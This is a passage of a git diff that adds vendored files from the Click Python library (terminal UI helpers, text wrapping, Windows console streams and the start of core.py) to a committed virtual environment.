+""" +import contextlib +import math +import os +import sys +import time +import typing as t +from gettext import gettext as _ +from io import StringIO +from types import TracebackType + +from ._compat import _default_text_stdout +from ._compat import CYGWIN +from ._compat import get_best_encoding +from ._compat import isatty +from ._compat import open_stream +from ._compat import strip_ansi +from ._compat import term_len +from ._compat import WIN +from .exceptions import ClickException +from .utils import echo + +V = t.TypeVar("V") + +if os.name == "nt": + BEFORE_BAR = "\r" + AFTER_BAR = "\n" +else: + BEFORE_BAR = "\r\033[?25l" + AFTER_BAR = "\033[?25h\n" + + +class ProgressBar(t.Generic[V]): + def __init__( + self, + iterable: t.Optional[t.Iterable[V]], + length: t.Optional[int] = None, + fill_char: str = "#", + empty_char: str = " ", + bar_template: str = "%(bar)s", + info_sep: str = " ", + show_eta: bool = True, + show_percent: t.Optional[bool] = None, + show_pos: bool = False, + item_show_func: t.Optional[t.Callable[[t.Optional[V]], t.Optional[str]]] = None, + label: t.Optional[str] = None, + file: t.Optional[t.TextIO] = None, + color: t.Optional[bool] = None, + update_min_steps: int = 1, + width: int = 30, + ) -> None: + self.fill_char = fill_char + self.empty_char = empty_char + self.bar_template = bar_template + self.info_sep = info_sep + self.show_eta = show_eta + self.show_percent = show_percent + self.show_pos = show_pos + self.item_show_func = item_show_func + self.label: str = label or "" + + if file is None: + file = _default_text_stdout() + + # There are no standard streams attached to write to. For example, + # pythonw on Windows. + if file is None: + file = StringIO() + + self.file = file + self.color = color + self.update_min_steps = update_min_steps + self._completed_intervals = 0 + self.width: int = width + self.autowidth: bool = width == 0 + + if length is None: + from operator import length_hint + + length = length_hint(iterable, -1) + + if length == -1: + length = None + if iterable is None: + if length is None: + raise TypeError("iterable or length is required") + iterable = t.cast(t.Iterable[V], range(length)) + self.iter: t.Iterable[V] = iter(iterable) + self.length = length + self.pos = 0 + self.avg: t.List[float] = [] + self.last_eta: float + self.start: float + self.start = self.last_eta = time.time() + self.eta_known: bool = False + self.finished: bool = False + self.max_width: t.Optional[int] = None + self.entered: bool = False + self.current_item: t.Optional[V] = None + self.is_hidden: bool = not isatty(self.file) + self._last_line: t.Optional[str] = None + + def __enter__(self) -> "ProgressBar[V]": + self.entered = True + self.render_progress() + return self + + def __exit__( + self, + exc_type: t.Optional[t.Type[BaseException]], + exc_value: t.Optional[BaseException], + tb: t.Optional[TracebackType], + ) -> None: + self.render_finish() + + def __iter__(self) -> t.Iterator[V]: + if not self.entered: + raise RuntimeError("You need to use progress bars in a with block.") + self.render_progress() + return self.generator() + + def __next__(self) -> V: + # Iteration is defined in terms of a generator function, + # returned by iter(self); use that to define next(). This works + # because `self.iter` is an iterable consumed by that generator, + # so it is re-entry safe. Calling `next(self.generator())` + # twice works and does "what you want". 
+ return next(iter(self)) + + def render_finish(self) -> None: + if self.is_hidden: + return + self.file.write(AFTER_BAR) + self.file.flush() + + @property + def pct(self) -> float: + if self.finished: + return 1.0 + return min(self.pos / (float(self.length or 1) or 1), 1.0) + + @property + def time_per_iteration(self) -> float: + if not self.avg: + return 0.0 + return sum(self.avg) / float(len(self.avg)) + + @property + def eta(self) -> float: + if self.length is not None and not self.finished: + return self.time_per_iteration * (self.length - self.pos) + return 0.0 + + def format_eta(self) -> str: + if self.eta_known: + t = int(self.eta) + seconds = t % 60 + t //= 60 + minutes = t % 60 + t //= 60 + hours = t % 24 + t //= 24 + if t > 0: + return f"{t}d {hours:02}:{minutes:02}:{seconds:02}" + else: + return f"{hours:02}:{minutes:02}:{seconds:02}" + return "" + + def format_pos(self) -> str: + pos = str(self.pos) + if self.length is not None: + pos += f"/{self.length}" + return pos + + def format_pct(self) -> str: + return f"{int(self.pct * 100): 4}%"[1:] + + def format_bar(self) -> str: + if self.length is not None: + bar_length = int(self.pct * self.width) + bar = self.fill_char * bar_length + bar += self.empty_char * (self.width - bar_length) + elif self.finished: + bar = self.fill_char * self.width + else: + chars = list(self.empty_char * (self.width or 1)) + if self.time_per_iteration != 0: + chars[ + int( + (math.cos(self.pos * self.time_per_iteration) / 2.0 + 0.5) + * self.width + ) + ] = self.fill_char + bar = "".join(chars) + return bar + + def format_progress_line(self) -> str: + show_percent = self.show_percent + + info_bits = [] + if self.length is not None and show_percent is None: + show_percent = not self.show_pos + + if self.show_pos: + info_bits.append(self.format_pos()) + if show_percent: + info_bits.append(self.format_pct()) + if self.show_eta and self.eta_known and not self.finished: + info_bits.append(self.format_eta()) + if self.item_show_func is not None: + item_info = self.item_show_func(self.current_item) + if item_info is not None: + info_bits.append(item_info) + + return ( + self.bar_template + % { + "label": self.label, + "bar": self.format_bar(), + "info": self.info_sep.join(info_bits), + } + ).rstrip() + + def render_progress(self) -> None: + import shutil + + if self.is_hidden: + # Only output the label as it changes if the output is not a + # TTY. Use file=stderr if you expect to be piping stdout. + if self._last_line != self.label: + self._last_line = self.label + echo(self.label, file=self.file, color=self.color) + + return + + buf = [] + # Update width in case the terminal has been resized + if self.autowidth: + old_width = self.width + self.width = 0 + clutter_length = term_len(self.format_progress_line()) + new_width = max(0, shutil.get_terminal_size().columns - clutter_length) + if new_width < old_width: + buf.append(BEFORE_BAR) + buf.append(" " * self.max_width) # type: ignore + self.max_width = new_width + self.width = new_width + + clear_width = self.width + if self.max_width is not None: + clear_width = self.max_width + + buf.append(BEFORE_BAR) + line = self.format_progress_line() + line_len = term_len(line) + if self.max_width is None or self.max_width < line_len: + self.max_width = line_len + + buf.append(line) + buf.append(" " * (clear_width - line_len)) + line = "".join(buf) + # Render the line only if it changed. 
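+        # Re-echoing an identical line would just add terminal writes and
+        # flicker, so unchanged renders are skipped.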
+ + if line != self._last_line: + self._last_line = line + echo(line, file=self.file, color=self.color, nl=False) + self.file.flush() + + def make_step(self, n_steps: int) -> None: + self.pos += n_steps + if self.length is not None and self.pos >= self.length: + self.finished = True + + if (time.time() - self.last_eta) < 1.0: + return + + self.last_eta = time.time() + + # self.avg is a rolling list of length <= 7 of steps where steps are + # defined as time elapsed divided by the total progress through + # self.length. + if self.pos: + step = (time.time() - self.start) / self.pos + else: + step = time.time() - self.start + + self.avg = self.avg[-6:] + [step] + + self.eta_known = self.length is not None + + def update(self, n_steps: int, current_item: t.Optional[V] = None) -> None: + """Update the progress bar by advancing a specified number of + steps, and optionally set the ``current_item`` for this new + position. + + :param n_steps: Number of steps to advance. + :param current_item: Optional item to set as ``current_item`` + for the updated position. + + .. versionchanged:: 8.0 + Added the ``current_item`` optional parameter. + + .. versionchanged:: 8.0 + Only render when the number of steps meets the + ``update_min_steps`` threshold. + """ + if current_item is not None: + self.current_item = current_item + + self._completed_intervals += n_steps + + if self._completed_intervals >= self.update_min_steps: + self.make_step(self._completed_intervals) + self.render_progress() + self._completed_intervals = 0 + + def finish(self) -> None: + self.eta_known = False + self.current_item = None + self.finished = True + + def generator(self) -> t.Iterator[V]: + """Return a generator which yields the items added to the bar + during construction, and updates the progress bar *after* the + yielded block returns. + """ + # WARNING: the iterator interface for `ProgressBar` relies on + # this and only works because this is a simple generator which + # doesn't create or manage additional state. If this function + # changes, the impact should be evaluated both against + # `iter(bar)` and `next(bar)`. `next()` in particular may call + # `self.generator()` repeatedly, and this must remain safe in + # order for that interface to work. + if not self.entered: + raise RuntimeError("You need to use progress bars in a with block.") + + if self.is_hidden: + yield from self.iter + else: + for rv in self.iter: + self.current_item = rv + + # This allows show_item_func to be updated before the + # item is processed. Only trigger at the beginning of + # the update interval. + if self._completed_intervals == 0: + self.render_progress() + + yield rv + self.update(1) + + self.finish() + self.render_progress() + + +def pager(generator: t.Iterable[str], color: t.Optional[bool] = None) -> None: + """Decide what method to use for paging through text.""" + stdout = _default_text_stdout() + + # There are no standard streams attached to write to. For example, + # pythonw on Windows. 
+ if stdout is None: + stdout = StringIO() + + if not isatty(sys.stdin) or not isatty(stdout): + return _nullpager(stdout, generator, color) + pager_cmd = (os.environ.get("PAGER", None) or "").strip() + if pager_cmd: + if WIN: + return _tempfilepager(generator, pager_cmd, color) + return _pipepager(generator, pager_cmd, color) + if os.environ.get("TERM") in ("dumb", "emacs"): + return _nullpager(stdout, generator, color) + if WIN or sys.platform.startswith("os2"): + return _tempfilepager(generator, "more <", color) + if hasattr(os, "system") and os.system("(less) 2>/dev/null") == 0: + return _pipepager(generator, "less", color) + + import tempfile + + fd, filename = tempfile.mkstemp() + os.close(fd) + try: + if hasattr(os, "system") and os.system(f'more "{filename}"') == 0: + return _pipepager(generator, "more", color) + return _nullpager(stdout, generator, color) + finally: + os.unlink(filename) + + +def _pipepager(generator: t.Iterable[str], cmd: str, color: t.Optional[bool]) -> None: + """Page through text by feeding it to another program. Invoking a + pager through this might support colors. + """ + import subprocess + + env = dict(os.environ) + + # If we're piping to less we might support colors under the + # condition that + cmd_detail = cmd.rsplit("/", 1)[-1].split() + if color is None and cmd_detail[0] == "less": + less_flags = f"{os.environ.get('LESS', '')}{' '.join(cmd_detail[1:])}" + if not less_flags: + env["LESS"] = "-R" + color = True + elif "r" in less_flags or "R" in less_flags: + color = True + + c = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, env=env) + stdin = t.cast(t.BinaryIO, c.stdin) + encoding = get_best_encoding(stdin) + try: + for text in generator: + if not color: + text = strip_ansi(text) + + stdin.write(text.encode(encoding, "replace")) + except (OSError, KeyboardInterrupt): + pass + else: + stdin.close() + + # Less doesn't respect ^C, but catches it for its own UI purposes (aborting + # search or other commands inside less). + # + # That means when the user hits ^C, the parent process (click) terminates, + # but less is still alive, paging the output and messing up the terminal. + # + # If the user wants to make the pager exit on ^C, they should set + # `LESS='-K'`. It's not our decision to make. + while True: + try: + c.wait() + except KeyboardInterrupt: + pass + else: + break + + +def _tempfilepager( + generator: t.Iterable[str], cmd: str, color: t.Optional[bool] +) -> None: + """Page through text by invoking a program on a temporary file.""" + import tempfile + + fd, filename = tempfile.mkstemp() + # TODO: This never terminates if the passed generator never terminates. + text = "".join(generator) + if not color: + text = strip_ansi(text) + encoding = get_best_encoding(sys.stdout) + with open_stream(filename, "wb")[0] as f: + f.write(text.encode(encoding)) + try: + os.system(f'{cmd} "{filename}"') + finally: + os.close(fd) + os.unlink(filename) + + +def _nullpager( + stream: t.TextIO, generator: t.Iterable[str], color: t.Optional[bool] +) -> None: + """Simply print unformatted text. 
This is the ultimate fallback.""" + for text in generator: + if not color: + text = strip_ansi(text) + stream.write(text) + + +class Editor: + def __init__( + self, + editor: t.Optional[str] = None, + env: t.Optional[t.Mapping[str, str]] = None, + require_save: bool = True, + extension: str = ".txt", + ) -> None: + self.editor = editor + self.env = env + self.require_save = require_save + self.extension = extension + + def get_editor(self) -> str: + if self.editor is not None: + return self.editor + for key in "VISUAL", "EDITOR": + rv = os.environ.get(key) + if rv: + return rv + if WIN: + return "notepad" + for editor in "sensible-editor", "vim", "nano": + if os.system(f"which {editor} >/dev/null 2>&1") == 0: + return editor + return "vi" + + def edit_file(self, filename: str) -> None: + import subprocess + + editor = self.get_editor() + environ: t.Optional[t.Dict[str, str]] = None + + if self.env: + environ = os.environ.copy() + environ.update(self.env) + + try: + c = subprocess.Popen(f'{editor} "{filename}"', env=environ, shell=True) + exit_code = c.wait() + if exit_code != 0: + raise ClickException( + _("{editor}: Editing failed").format(editor=editor) + ) + except OSError as e: + raise ClickException( + _("{editor}: Editing failed: {e}").format(editor=editor, e=e) + ) from e + + def edit(self, text: t.Optional[t.AnyStr]) -> t.Optional[t.AnyStr]: + import tempfile + + if not text: + data = b"" + elif isinstance(text, (bytes, bytearray)): + data = text + else: + if text and not text.endswith("\n"): + text += "\n" + + if WIN: + data = text.replace("\n", "\r\n").encode("utf-8-sig") + else: + data = text.encode("utf-8") + + fd, name = tempfile.mkstemp(prefix="editor-", suffix=self.extension) + f: t.BinaryIO + + try: + with os.fdopen(fd, "wb") as f: + f.write(data) + + # If the filesystem resolution is 1 second, like Mac OS + # 10.12 Extended, or 2 seconds, like FAT32, and the editor + # closes very fast, require_save can fail. Set the modified + # time to be 2 seconds in the past to work around this. + os.utime(name, (os.path.getatime(name), os.path.getmtime(name) - 2)) + # Depending on the resolution, the exact value might not be + # recorded, so get the new recorded value. 
+ timestamp = os.path.getmtime(name) + + self.edit_file(name) + + if self.require_save and os.path.getmtime(name) == timestamp: + return None + + with open(name, "rb") as f: + rv = f.read() + + if isinstance(text, (bytes, bytearray)): + return rv + + return rv.decode("utf-8-sig").replace("\r\n", "\n") # type: ignore + finally: + os.unlink(name) + + +def open_url(url: str, wait: bool = False, locate: bool = False) -> int: + import subprocess + + def _unquote_file(url: str) -> str: + from urllib.parse import unquote + + if url.startswith("file://"): + url = unquote(url[7:]) + + return url + + if sys.platform == "darwin": + args = ["open"] + if wait: + args.append("-W") + if locate: + args.append("-R") + args.append(_unquote_file(url)) + null = open("/dev/null", "w") + try: + return subprocess.Popen(args, stderr=null).wait() + finally: + null.close() + elif WIN: + if locate: + url = _unquote_file(url.replace('"', "")) + args = f'explorer /select,"{url}"' + else: + url = url.replace('"', "") + wait_str = "/WAIT" if wait else "" + args = f'start {wait_str} "" "{url}"' + return os.system(args) + elif CYGWIN: + if locate: + url = os.path.dirname(_unquote_file(url).replace('"', "")) + args = f'cygstart "{url}"' + else: + url = url.replace('"', "") + wait_str = "-w" if wait else "" + args = f'cygstart {wait_str} "{url}"' + return os.system(args) + + try: + if locate: + url = os.path.dirname(_unquote_file(url)) or "." + else: + url = _unquote_file(url) + c = subprocess.Popen(["xdg-open", url]) + if wait: + return c.wait() + return 0 + except OSError: + if url.startswith(("http://", "https://")) and not locate and not wait: + import webbrowser + + webbrowser.open(url) + return 0 + return 1 + + +def _translate_ch_to_exc(ch: str) -> t.Optional[BaseException]: + if ch == "\x03": + raise KeyboardInterrupt() + + if ch == "\x04" and not WIN: # Unix-like, Ctrl+D + raise EOFError() + + if ch == "\x1a" and WIN: # Windows, Ctrl+Z + raise EOFError() + + return None + + +if WIN: + import msvcrt + + @contextlib.contextmanager + def raw_terminal() -> t.Iterator[int]: + yield -1 + + def getchar(echo: bool) -> str: + # The function `getch` will return a bytes object corresponding to + # the pressed character. Since Windows 10 build 1803, it will also + # return \x00 when called a second time after pressing a regular key. + # + # `getwch` does not share this probably-bugged behavior. Moreover, it + # returns a Unicode object by default, which is what we want. + # + # Either of these functions will return \x00 or \xe0 to indicate + # a special key, and you need to call the same function again to get + # the "rest" of the code. The fun part is that \u00e0 is + # "latin small letter a with grave", so if you type that on a French + # keyboard, you _also_ get a \xe0. + # E.g., consider the Up arrow. This returns \xe0 and then \x48. The + # resulting Unicode string reads as "a with grave" + "capital H". + # This is indistinguishable from when the user actually types + # "a with grave" and then "capital H". + # + # When \xe0 is returned, we assume it's part of a special-key sequence + # and call `getwch` again, but that means that when the user types + # the \u00e0 character, `getchar` doesn't return until a second + # character is typed. + # The alternative is returning immediately, but that would mess up + # cross-platform handling of arrow keys and others that start with + # \xe0. 
Another option is using `getch`, but then we can't reliably + # read non-ASCII characters, because return values of `getch` are + # limited to the current 8-bit codepage. + # + # Anyway, Click doesn't claim to do this Right(tm), and using `getwch` + # is doing the right thing in more situations than with `getch`. + func: t.Callable[[], str] + + if echo: + func = msvcrt.getwche # type: ignore + else: + func = msvcrt.getwch # type: ignore + + rv = func() + + if rv in ("\x00", "\xe0"): + # \x00 and \xe0 are control characters that indicate special key, + # see above. + rv += func() + + _translate_ch_to_exc(rv) + return rv + +else: + import tty + import termios + + @contextlib.contextmanager + def raw_terminal() -> t.Iterator[int]: + f: t.Optional[t.TextIO] + fd: int + + if not isatty(sys.stdin): + f = open("/dev/tty") + fd = f.fileno() + else: + fd = sys.stdin.fileno() + f = None + + try: + old_settings = termios.tcgetattr(fd) + + try: + tty.setraw(fd) + yield fd + finally: + termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) + sys.stdout.flush() + + if f is not None: + f.close() + except termios.error: + pass + + def getchar(echo: bool) -> str: + with raw_terminal() as fd: + ch = os.read(fd, 32).decode(get_best_encoding(sys.stdin), "replace") + + if echo and isatty(sys.stdout): + sys.stdout.write(ch) + + _translate_ch_to_exc(ch) + return ch diff --git a/env/Lib/site-packages/click/_textwrap.py b/env/Lib/site-packages/click/_textwrap.py new file mode 100644 index 00000000..b47dcbd4 --- /dev/null +++ b/env/Lib/site-packages/click/_textwrap.py @@ -0,0 +1,49 @@ +import textwrap +import typing as t +from contextlib import contextmanager + + +class TextWrapper(textwrap.TextWrapper): + def _handle_long_word( + self, + reversed_chunks: t.List[str], + cur_line: t.List[str], + cur_len: int, + width: int, + ) -> None: + space_left = max(width - cur_len, 1) + + if self.break_long_words: + last = reversed_chunks[-1] + cut = last[:space_left] + res = last[space_left:] + cur_line.append(cut) + reversed_chunks[-1] = res + elif not cur_line: + cur_line.append(reversed_chunks.pop()) + + @contextmanager + def extra_indent(self, indent: str) -> t.Iterator[None]: + old_initial_indent = self.initial_indent + old_subsequent_indent = self.subsequent_indent + self.initial_indent += indent + self.subsequent_indent += indent + + try: + yield + finally: + self.initial_indent = old_initial_indent + self.subsequent_indent = old_subsequent_indent + + def indent_only(self, text: str) -> str: + rv = [] + + for idx, line in enumerate(text.splitlines()): + indent = self.initial_indent + + if idx > 0: + indent = self.subsequent_indent + + rv.append(f"{indent}{line}") + + return "\n".join(rv) diff --git a/env/Lib/site-packages/click/_winconsole.py b/env/Lib/site-packages/click/_winconsole.py new file mode 100644 index 00000000..6b20df31 --- /dev/null +++ b/env/Lib/site-packages/click/_winconsole.py @@ -0,0 +1,279 @@ +# This module is based on the excellent work by Adam Bartoš who +# provided a lot of what went into the implementation here in +# the discussion to issue1602 in the Python bug tracker. +# +# There are some general differences in regards to how this works +# compared to the original patches as we do not need to patch +# the entire interpreter but just work in our little world of +# echo and prompt. 
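+#
+# Rough shape of how the rest of click reaches this module (a sketch of the
+# internal wiring, not a public API): each standard stream is probed with
+# _get_windows_console_stream(), which returns a UTF-16-LE backed wrapper
+# only for real console handles with a compatible encoding, e.g.
+#
+#     stream = _get_windows_console_stream(sys.stdout, None, None)
+#     if stream is not None:
+#         sys.stdout = stream  # illustrative only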
+import io +import sys +import time +import typing as t +from ctypes import byref +from ctypes import c_char +from ctypes import c_char_p +from ctypes import c_int +from ctypes import c_ssize_t +from ctypes import c_ulong +from ctypes import c_void_p +from ctypes import POINTER +from ctypes import py_object +from ctypes import Structure +from ctypes.wintypes import DWORD +from ctypes.wintypes import HANDLE +from ctypes.wintypes import LPCWSTR +from ctypes.wintypes import LPWSTR + +from ._compat import _NonClosingTextIOWrapper + +assert sys.platform == "win32" +import msvcrt # noqa: E402 +from ctypes import windll # noqa: E402 +from ctypes import WINFUNCTYPE # noqa: E402 + +c_ssize_p = POINTER(c_ssize_t) + +kernel32 = windll.kernel32 +GetStdHandle = kernel32.GetStdHandle +ReadConsoleW = kernel32.ReadConsoleW +WriteConsoleW = kernel32.WriteConsoleW +GetConsoleMode = kernel32.GetConsoleMode +GetLastError = kernel32.GetLastError +GetCommandLineW = WINFUNCTYPE(LPWSTR)(("GetCommandLineW", windll.kernel32)) +CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))( + ("CommandLineToArgvW", windll.shell32) +) +LocalFree = WINFUNCTYPE(c_void_p, c_void_p)(("LocalFree", windll.kernel32)) + +STDIN_HANDLE = GetStdHandle(-10) +STDOUT_HANDLE = GetStdHandle(-11) +STDERR_HANDLE = GetStdHandle(-12) + +PyBUF_SIMPLE = 0 +PyBUF_WRITABLE = 1 + +ERROR_SUCCESS = 0 +ERROR_NOT_ENOUGH_MEMORY = 8 +ERROR_OPERATION_ABORTED = 995 + +STDIN_FILENO = 0 +STDOUT_FILENO = 1 +STDERR_FILENO = 2 + +EOF = b"\x1a" +MAX_BYTES_WRITTEN = 32767 + +try: + from ctypes import pythonapi +except ImportError: + # On PyPy we cannot get buffers so our ability to operate here is + # severely limited. + get_buffer = None +else: + + class Py_buffer(Structure): + _fields_ = [ + ("buf", c_void_p), + ("obj", py_object), + ("len", c_ssize_t), + ("itemsize", c_ssize_t), + ("readonly", c_int), + ("ndim", c_int), + ("format", c_char_p), + ("shape", c_ssize_p), + ("strides", c_ssize_p), + ("suboffsets", c_ssize_p), + ("internal", c_void_p), + ] + + PyObject_GetBuffer = pythonapi.PyObject_GetBuffer + PyBuffer_Release = pythonapi.PyBuffer_Release + + def get_buffer(obj, writable=False): + buf = Py_buffer() + flags = PyBUF_WRITABLE if writable else PyBUF_SIMPLE + PyObject_GetBuffer(py_object(obj), byref(buf), flags) + + try: + buffer_type = c_char * buf.len + return buffer_type.from_address(buf.buf) + finally: + PyBuffer_Release(byref(buf)) + + +class _WindowsConsoleRawIOBase(io.RawIOBase): + def __init__(self, handle): + self.handle = handle + + def isatty(self): + super().isatty() + return True + + +class _WindowsConsoleReader(_WindowsConsoleRawIOBase): + def readable(self): + return True + + def readinto(self, b): + bytes_to_be_read = len(b) + if not bytes_to_be_read: + return 0 + elif bytes_to_be_read % 2: + raise ValueError( + "cannot read odd number of bytes from UTF-16-LE encoded console" + ) + + buffer = get_buffer(b, writable=True) + code_units_to_be_read = bytes_to_be_read // 2 + code_units_read = c_ulong() + + rv = ReadConsoleW( + HANDLE(self.handle), + buffer, + code_units_to_be_read, + byref(code_units_read), + None, + ) + if GetLastError() == ERROR_OPERATION_ABORTED: + # wait for KeyboardInterrupt + time.sleep(0.1) + if not rv: + raise OSError(f"Windows error: {GetLastError()}") + + if buffer[0] == EOF: + return 0 + return 2 * code_units_read.value + + +class _WindowsConsoleWriter(_WindowsConsoleRawIOBase): + def writable(self): + return True + + @staticmethod + def _get_error_message(errno): + if errno == ERROR_SUCCESS: + 
return "ERROR_SUCCESS" + elif errno == ERROR_NOT_ENOUGH_MEMORY: + return "ERROR_NOT_ENOUGH_MEMORY" + return f"Windows error {errno}" + + def write(self, b): + bytes_to_be_written = len(b) + buf = get_buffer(b) + code_units_to_be_written = min(bytes_to_be_written, MAX_BYTES_WRITTEN) // 2 + code_units_written = c_ulong() + + WriteConsoleW( + HANDLE(self.handle), + buf, + code_units_to_be_written, + byref(code_units_written), + None, + ) + bytes_written = 2 * code_units_written.value + + if bytes_written == 0 and bytes_to_be_written > 0: + raise OSError(self._get_error_message(GetLastError())) + return bytes_written + + +class ConsoleStream: + def __init__(self, text_stream: t.TextIO, byte_stream: t.BinaryIO) -> None: + self._text_stream = text_stream + self.buffer = byte_stream + + @property + def name(self) -> str: + return self.buffer.name + + def write(self, x: t.AnyStr) -> int: + if isinstance(x, str): + return self._text_stream.write(x) + try: + self.flush() + except Exception: + pass + return self.buffer.write(x) + + def writelines(self, lines: t.Iterable[t.AnyStr]) -> None: + for line in lines: + self.write(line) + + def __getattr__(self, name: str) -> t.Any: + return getattr(self._text_stream, name) + + def isatty(self) -> bool: + return self.buffer.isatty() + + def __repr__(self): + return f"" + + +def _get_text_stdin(buffer_stream: t.BinaryIO) -> t.TextIO: + text_stream = _NonClosingTextIOWrapper( + io.BufferedReader(_WindowsConsoleReader(STDIN_HANDLE)), + "utf-16-le", + "strict", + line_buffering=True, + ) + return t.cast(t.TextIO, ConsoleStream(text_stream, buffer_stream)) + + +def _get_text_stdout(buffer_stream: t.BinaryIO) -> t.TextIO: + text_stream = _NonClosingTextIOWrapper( + io.BufferedWriter(_WindowsConsoleWriter(STDOUT_HANDLE)), + "utf-16-le", + "strict", + line_buffering=True, + ) + return t.cast(t.TextIO, ConsoleStream(text_stream, buffer_stream)) + + +def _get_text_stderr(buffer_stream: t.BinaryIO) -> t.TextIO: + text_stream = _NonClosingTextIOWrapper( + io.BufferedWriter(_WindowsConsoleWriter(STDERR_HANDLE)), + "utf-16-le", + "strict", + line_buffering=True, + ) + return t.cast(t.TextIO, ConsoleStream(text_stream, buffer_stream)) + + +_stream_factories: t.Mapping[int, t.Callable[[t.BinaryIO], t.TextIO]] = { + 0: _get_text_stdin, + 1: _get_text_stdout, + 2: _get_text_stderr, +} + + +def _is_console(f: t.TextIO) -> bool: + if not hasattr(f, "fileno"): + return False + + try: + fileno = f.fileno() + except (OSError, io.UnsupportedOperation): + return False + + handle = msvcrt.get_osfhandle(fileno) + return bool(GetConsoleMode(handle, byref(DWORD()))) + + +def _get_windows_console_stream( + f: t.TextIO, encoding: t.Optional[str], errors: t.Optional[str] +) -> t.Optional[t.TextIO]: + if ( + get_buffer is not None + and encoding in {"utf-16-le", None} + and errors in {"strict", None} + and _is_console(f) + ): + func = _stream_factories.get(f.fileno()) + if func is not None: + b = getattr(f, "buffer", None) + + if b is None: + return None + + return func(b) diff --git a/env/Lib/site-packages/click/core.py b/env/Lib/site-packages/click/core.py new file mode 100644 index 00000000..cc65e896 --- /dev/null +++ b/env/Lib/site-packages/click/core.py @@ -0,0 +1,3042 @@ +import enum +import errno +import inspect +import os +import sys +import typing as t +from collections import abc +from contextlib import contextmanager +from contextlib import ExitStack +from functools import update_wrapper +from gettext import gettext as _ +from gettext import ngettext +from itertools import repeat 
+from types import TracebackType + +from . import types +from .exceptions import Abort +from .exceptions import BadParameter +from .exceptions import ClickException +from .exceptions import Exit +from .exceptions import MissingParameter +from .exceptions import UsageError +from .formatting import HelpFormatter +from .formatting import join_options +from .globals import pop_context +from .globals import push_context +from .parser import _flag_needs_value +from .parser import OptionParser +from .parser import split_opt +from .termui import confirm +from .termui import prompt +from .termui import style +from .utils import _detect_program_name +from .utils import _expand_args +from .utils import echo +from .utils import make_default_short_help +from .utils import make_str +from .utils import PacifyFlushWrapper + +if t.TYPE_CHECKING: + import typing_extensions as te + from .shell_completion import CompletionItem + +F = t.TypeVar("F", bound=t.Callable[..., t.Any]) +V = t.TypeVar("V") + + +def _complete_visible_commands( + ctx: "Context", incomplete: str +) -> t.Iterator[t.Tuple[str, "Command"]]: + """List all the subcommands of a group that start with the + incomplete value and aren't hidden. + + :param ctx: Invocation context for the group. + :param incomplete: Value being completed. May be empty. + """ + multi = t.cast(MultiCommand, ctx.command) + + for name in multi.list_commands(ctx): + if name.startswith(incomplete): + command = multi.get_command(ctx, name) + + if command is not None and not command.hidden: + yield name, command + + +def _check_multicommand( + base_command: "MultiCommand", cmd_name: str, cmd: "Command", register: bool = False +) -> None: + if not base_command.chain or not isinstance(cmd, MultiCommand): + return + if register: + hint = ( + "It is not possible to add multi commands as children to" + " another multi command that is in chain mode." + ) + else: + hint = ( + "Found a multi command as subcommand to a multi command" + " that is in chain mode. This is not supported." + ) + raise RuntimeError( + f"{hint}. Command {base_command.name!r} is set to chain and" + f" {cmd_name!r} was added as a subcommand but it in itself is a" + f" multi command. ({cmd_name!r} is a {type(cmd).__name__}" + f" within a chained {type(base_command).__name__} named" + f" {base_command.name!r})." + ) + + +def batch(iterable: t.Iterable[V], batch_size: int) -> t.List[t.Tuple[V, ...]]: + return list(zip(*repeat(iter(iterable), batch_size))) + + +@contextmanager +def augment_usage_errors( + ctx: "Context", param: t.Optional["Parameter"] = None +) -> t.Iterator[None]: + """Context manager that attaches extra information to exceptions.""" + try: + yield + except BadParameter as e: + if e.ctx is None: + e.ctx = ctx + if param is not None and e.param is None: + e.param = param + raise + except UsageError as e: + if e.ctx is None: + e.ctx = ctx + raise + + +def iter_params_for_processing( + invocation_order: t.Sequence["Parameter"], + declaration_order: t.Sequence["Parameter"], +) -> t.List["Parameter"]: + """Given a sequence of parameters in the order as should be considered + for processing and an iterable of parameters that exist, this returns + a list in the correct order as they should be processed. 
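+
+    Concretely: eager parameters are processed before non-eager ones, and
+    within each group the parameters that appeared on the command line are
+    handled in the order they were given, with parameters that were not
+    passed at all keeping their declaration order after them.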
+ """ + + def sort_key(item: "Parameter") -> t.Tuple[bool, float]: + try: + idx: float = invocation_order.index(item) + except ValueError: + idx = float("inf") + + return not item.is_eager, idx + + return sorted(declaration_order, key=sort_key) + + +class ParameterSource(enum.Enum): + """This is an :class:`~enum.Enum` that indicates the source of a + parameter's value. + + Use :meth:`click.Context.get_parameter_source` to get the + source for a parameter by name. + + .. versionchanged:: 8.0 + Use :class:`~enum.Enum` and drop the ``validate`` method. + + .. versionchanged:: 8.0 + Added the ``PROMPT`` value. + """ + + COMMANDLINE = enum.auto() + """The value was provided by the command line args.""" + ENVIRONMENT = enum.auto() + """The value was provided with an environment variable.""" + DEFAULT = enum.auto() + """Used the default specified by the parameter.""" + DEFAULT_MAP = enum.auto() + """Used a default provided by :attr:`Context.default_map`.""" + PROMPT = enum.auto() + """Used a prompt to confirm a default or provide a value.""" + + +class Context: + """The context is a special internal object that holds state relevant + for the script execution at every single level. It's normally invisible + to commands unless they opt-in to getting access to it. + + The context is useful as it can pass internal objects around and can + control special execution features such as reading data from + environment variables. + + A context can be used as context manager in which case it will call + :meth:`close` on teardown. + + :param command: the command class for this context. + :param parent: the parent context. + :param info_name: the info name for this invocation. Generally this + is the most descriptive name for the script or + command. For the toplevel script it is usually + the name of the script, for commands below it it's + the name of the script. + :param obj: an arbitrary object of user data. + :param auto_envvar_prefix: the prefix to use for automatic environment + variables. If this is `None` then reading + from environment variables is disabled. This + does not affect manually set environment + variables which are always read. + :param default_map: a dictionary (like object) with default values + for parameters. + :param terminal_width: the width of the terminal. The default is + inherit from parent context. If no context + defines the terminal width then auto + detection will be applied. + :param max_content_width: the maximum width for content rendered by + Click (this currently only affects help + pages). This defaults to 80 characters if + not overridden. In other words: even if the + terminal is larger than that, Click will not + format things wider than 80 characters by + default. In addition to that, formatters might + add some safety mapping on the right. + :param resilient_parsing: if this flag is enabled then Click will + parse without any interactivity or callback + invocation. Default values will also be + ignored. This is useful for implementing + things such as completion support. + :param allow_extra_args: if this is set to `True` then extra arguments + at the end will not raise an error and will be + kept on the context. The default is to inherit + from the command. + :param allow_interspersed_args: if this is set to `False` then options + and arguments cannot be mixed. The + default is to inherit from the command. + :param ignore_unknown_options: instructs click to ignore options it does + not know and keeps them for later + 